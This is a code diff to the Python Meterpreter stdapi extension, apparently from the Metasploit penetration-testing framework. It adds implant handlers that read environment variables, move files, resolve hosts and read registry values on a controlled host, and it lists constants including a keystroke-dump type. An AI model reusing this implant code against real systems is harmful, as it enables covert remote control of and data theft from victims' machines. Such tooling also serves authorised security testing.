-TLV_TYPE_IMAGE_GROUP =         TLV_META_TYPE_GROUP   | 2405
-TLV_TYPE_IMAGE_NAME =          TLV_META_TYPE_STRING  | 2406
+TLV_TYPE_IMAGE_FILE            = TLV_META_TYPE_STRING  | 2400
+TLV_TYPE_IMAGE_FILE_PATH       = TLV_META_TYPE_STRING  | 2401
+TLV_TYPE_PROCEDURE_NAME        = TLV_META_TYPE_STRING  | 2402
+TLV_TYPE_PROCEDURE_ADDRESS     = TLV_META_TYPE_UINT    | 2403
+TLV_TYPE_IMAGE_BASE            = TLV_META_TYPE_UINT    | 2404
+TLV_TYPE_IMAGE_GROUP           = TLV_META_TYPE_GROUP   | 2405
+TLV_TYPE_IMAGE_NAME            = TLV_META_TYPE_STRING  | 2406

-TLV_TYPE_THREAD_ID =           TLV_META_TYPE_UINT    | 2500
-TLV_TYPE_THREAD_PERMS =        TLV_META_TYPE_UINT    | 2502
-TLV_TYPE_EXIT_CODE =           TLV_META_TYPE_UINT    | 2510
-TLV_TYPE_ENTRY_POINT =         TLV_META_TYPE_UINT    | 2511
-TLV_TYPE_ENTRY_PARAMETER =     TLV_META_TYPE_UINT    | 2512
-TLV_TYPE_CREATION_FLAGS =      TLV_META_TYPE_UINT    | 2513
+TLV_TYPE_THREAD_ID             = TLV_META_TYPE_UINT    | 2500
+TLV_TYPE_THREAD_PERMS          = TLV_META_TYPE_UINT    | 2502
+TLV_TYPE_EXIT_CODE             = TLV_META_TYPE_UINT    | 2510
+TLV_TYPE_ENTRY_POINT           = TLV_META_TYPE_UINT    | 2511
+TLV_TYPE_ENTRY_PARAMETER       = TLV_META_TYPE_UINT    | 2512
+TLV_TYPE_CREATION_FLAGS        = TLV_META_TYPE_UINT    | 2513

-TLV_TYPE_REGISTER_NAME =       TLV_META_TYPE_STRING  | 2540
-TLV_TYPE_REGISTER_SIZE =       TLV_META_TYPE_UINT    | 2541
-TLV_TYPE_REGISTER_VALUE_32 =   TLV_META_TYPE_UINT    | 2542
-TLV_TYPE_REGISTER =            TLV_META_TYPE_GROUP   | 2550
+TLV_TYPE_REGISTER_NAME         = TLV_META_TYPE_STRING  | 2540
+TLV_TYPE_REGISTER_SIZE         = TLV_META_TYPE_UINT    | 2541
+TLV_TYPE_REGISTER_VALUE_32     = TLV_META_TYPE_UINT    | 2542
+TLV_TYPE_REGISTER              = TLV_META_TYPE_GROUP   | 2550

 ##
 # Ui
 ##
-TLV_TYPE_IDLE_TIME =           TLV_META_TYPE_UINT    | 3000
-TLV_TYPE_KEYS_DUMP =           TLV_META_TYPE_STRING  | 3001
-TLV_TYPE_DESKTOP =             TLV_META_TYPE_STRING  | 3002
+TLV_TYPE_IDLE_TIME             = TLV_META_TYPE_UINT    | 3000
+TLV_TYPE_KEYS_DUMP             = TLV_META_TYPE_STRING  | 3001
+TLV_TYPE_DESKTOP               = TLV_META_TYPE_STRING  | 3002

 ##
 # Event Log
 ##
-TLV_TYPE_EVENT_SOURCENAME =    TLV_META_TYPE_STRING  | 4000
-TLV_TYPE_EVENT_HANDLE =        TLV_META_TYPE_UINT    | 4001
-TLV_TYPE_EVENT_NUMRECORDS =    TLV_META_TYPE_UINT    | 4002
+TLV_TYPE_EVENT_SOURCENAME      = TLV_META_TYPE_STRING  | 4000
+TLV_TYPE_EVENT_HANDLE          = TLV_META_TYPE_UINT    | 4001
+TLV_TYPE_EVENT_NUMRECORDS      = TLV_META_TYPE_UINT    | 4002

-TLV_TYPE_EVENT_READFLAGS =     TLV_META_TYPE_UINT    | 4003
-TLV_TYPE_EVENT_RECORDOFFSET =  TLV_META_TYPE_UINT    | 4004
+TLV_TYPE_EVENT_READFLAGS       = TLV_META_TYPE_UINT    | 4003
+TLV_TYPE_EVENT_RECORDOFFSET    = TLV_META_TYPE_UINT    | 4004

-TLV_TYPE_EVENT_RECORDNUMBER =  TLV_META_TYPE_UINT    | 4006
-TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT    | 4007
-TLV_TYPE_EVENT_TIMEWRITTEN =   TLV_META_TYPE_UINT    | 4008
-TLV_TYPE_EVENT_ID =            TLV_META_TYPE_UINT    | 4009
-TLV_TYPE_EVENT_TYPE =          TLV_META_TYPE_UINT    | 4010
-TLV_TYPE_EVENT_CATEGORY =      TLV_META_TYPE_UINT    | 4011
-TLV_TYPE_EVENT_STRING =        TLV_META_TYPE_STRING  | 4012
-TLV_TYPE_EVENT_DATA =          TLV_META_TYPE_RAW     | 4013
+TLV_TYPE_EVENT_RECORDNUMBER    = TLV_META_TYPE_UINT    | 4006
+TLV_TYPE_EVENT_TIMEGENERATED   = TLV_META_TYPE_UINT    | 4007
+TLV_TYPE_EVENT_TIMEWRITTEN     = TLV_META_TYPE_UINT    | 4008
+TLV_TYPE_EVENT_ID              = TLV_META_TYPE_UINT    | 4009
+TLV_TYPE_EVENT_TYPE            = TLV_META_TYPE_UINT    | 4010
+TLV_TYPE_EVENT_CATEGORY        = TLV_META_TYPE_UINT    | 4011
+TLV_TYPE_EVENT_STRING          = TLV_META_TYPE_STRING  | 4012
+TLV_TYPE_EVENT_DATA            = TLV_META_TYPE_RAW     | 4013

 ##
 # Power
 ##
-TLV_TYPE_POWER_FLAGS =         TLV_META_TYPE_UINT    | 4100
-TLV_TYPE_POWER_REASON =        TLV_META_TYPE_UINT    | 4101
+TLV_TYPE_POWER_FLAGS           = TLV_META_TYPE_UINT    | 4100
+TLV_TYPE_POWER_REASON          = TLV_META_TYPE_UINT    | 4101

 ##
 # Sys
@@ -273,6 +290,9 @@ ERROR_FAILURE = 1
 # errors.
 ERROR_CONNECTION_ERROR = 10000

+WIN_AF_INET  = 2
+WIN_AF_INET6 = 23
+
 def get_stat_buffer(path):
 	si = os.stat(path)
 	rdev = 0
@@ -290,6 +310,27 @@ def get_stat_buffer(path):
 	st_buf += struct.pack('<II', blksize, blocks)
 	return st_buf

+def inet_pton(family, address):
+	if hasattr(socket, 'inet_pton'):
+		return socket.inet_pton(family, address)
+	elif has_windll:
+		WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
+		lpAddress = (ctypes.c_ubyte * 28)()
+		lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
+		if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
+			raise Exception('WSAStringToAddress failed')
+		if family == socket.AF_INET:
+			return ''.join(map(chr, lpAddress[4:8]))
+		elif family == socket.AF_INET6:
+			return ''.join(map(chr, lpAddress[8:24]))
+	raise Exception('no suitable inet_pton functionality is available')
+
+def resolve_host(hostname, family):
+	address_info = socket.getaddrinfo(hostname, 0, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP)[0]
+	family = address_info[0]
+	address = address_info[4][0]
+	return {'family':family, 'address':address, 'packed_address':inet_pton(family, address)}
+
 def windll_GetNativeSystemInfo():
 	if not has_windll:
 		return None
@@ -341,6 +382,18 @@ def stdapi_sys_config_getuid(request, response):
 	response += tlv_pack(TLV_TYPE_USER_NAME, getpass.getuser())
 	return ERROR_SUCCESS, response

+@meterpreter.register_function
+def stdapi_sys_config_getenv(request, response):
+	for env_var in packet_enum_tlvs(request, TLV_TYPE_ENV_VARIABLE):
+		pgroup = ''
+		env_var = env_var['value'].translate(None, '%$')
+		env_val = os.environ.get(env_var)
+		if env_val:
+			pgroup += tlv_pack(TLV_TYPE_ENV_VARIABLE, env_var)
+			pgroup += tlv_pack(TLV_TYPE_ENV_VALUE, env_val)
+			response += tlv_pack(TLV_TYPE_ENV_GROUP, pgroup)
+	return ERROR_SUCCESS, response
+
@meterpreter.register_function
 def stdapi_sys_config_sysinfo(request, response):
 	uname_info = platform.uname()
@@ -580,20 +633,28 @@ def stdapi_fs_delete_file(request, response):
@meterpreter.register_function
 def stdapi_fs_file_expand_path(request, response):
 	path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
-	if path_tlv == '%COMSPEC%':
-		if platform.system() == 'Windows':
-			result = 'cmd.exe'
-		else:
-			result = '/bin/sh'
-	elif path_tlv in ['%TEMP%', '%TMP%'] and platform.system() != 'Windows':
+	if has_windll:
+		path_out = (ctypes.c_char * 4096)()
+		path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out))
+		result = ''.join(path_out)[:path_out_len]
+	elif path_tlv == '%COMSPEC%':
+		result = '/bin/sh'
+	elif path_tlv in ['%TEMP%', '%TMP%']:
 		result = '/tmp'
 	else:
-		result = os.getenv(path_tlv)
+		result = os.getenv(path_tlv, path_tlv)
 	if not result:
 		return ERROR_FAILURE, response
 	response += tlv_pack(TLV_TYPE_FILE_PATH, result)
 	return ERROR_SUCCESS, response

+@meterpreter.register_function
+def stdapi_fs_file_move(request, response):
+	oldname = packet_get_tlv(request, TLV_TYPE_FILE_NAME)['value']
+	newname = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
+	os.rename(oldname, newname)
+	return ERROR_SUCCESS, response
+
@meterpreter.register_function
 def stdapi_fs_getwd(request, response):
 	response += tlv_pack(TLV_TYPE_DIRECTORY_PATH, os.getcwd())
@@ -622,7 +683,7 @@ def stdapi_fs_md5(request, response):
 		m = hashlib.md5()
 	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
 	m.update(open(path, 'rb').read())
-	response += tlv_pack(TLV_TYPE_FILE_NAME, m.hexdigest())
+	response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
 	return ERROR_SUCCESS, response

@meterpreter.register_function
@@ -669,7 +730,7 @@ def stdapi_fs_sha1(request, response):
 		m = hashlib.sha1()
 	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
 	m.update(open(path, 'rb').read())
-	response += tlv_pack(TLV_TYPE_FILE_NAME, m.hexdigest())
+	response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
 	return ERROR_SUCCESS, response

@meterpreter.register_function
@@ -679,6 +740,40 @@ def stdapi_fs_stat(request, response):
 	response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf)
 	return ERROR_SUCCESS, response

+@meterpreter.register_function
+def stdapi_net_resolve_host(request, response):
+	hostname = packet_get_tlv(request, TLV_TYPE_HOST_NAME)['value']
+	family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
+	if family == WIN_AF_INET:
+		family = socket.AF_INET
+	elif family == WIN_AF_INET6:
+		family = socket.AF_INET6
+	else:
+		raise Exception('invalid family')
+	result = resolve_host(hostname, family)
+	response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
+	response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_net_resolve_hosts(request, response):
+	family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
+	if family == WIN_AF_INET:
+		family = socket.AF_INET
+	elif family == WIN_AF_INET6:
+		family = socket.AF_INET6
+	else:
+		raise Exception('invalid family')
+	for hostname in packet_enum_tlvs(request, TLV_TYPE_HOST_NAME):
+		hostname = hostname['value']
+		try:
+			result = resolve_host(hostname, family)
+		except socket.error:
+			result = {'family':family, 'packed_address':''}
+		response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
+		response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
+	return ERROR_SUCCESS, response
+
@meterpreter.register_function
 def stdapi_net_socket_tcp_shutdown(request, response):
 	channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)
@@ -834,9 +929,12 @@ def stdapi_registry_query_value(request, response):
 		if value_type.value == REG_SZ:
 			response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00')
 		elif value_type.value == REG_DWORD:
-			response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:4])
+			value = value_data[:4]
+			value.reverse()
+			value = ''.join(map(chr, value))
+			response += tlv_pack(TLV_TYPE_VALUE_DATA, value)
 		else:
-			response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:value_data_sz.value])
+			response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
 		return ERROR_SUCCESS, response
 	return ERROR_FAILURE, response

--- a/Show More
+++ b/Show More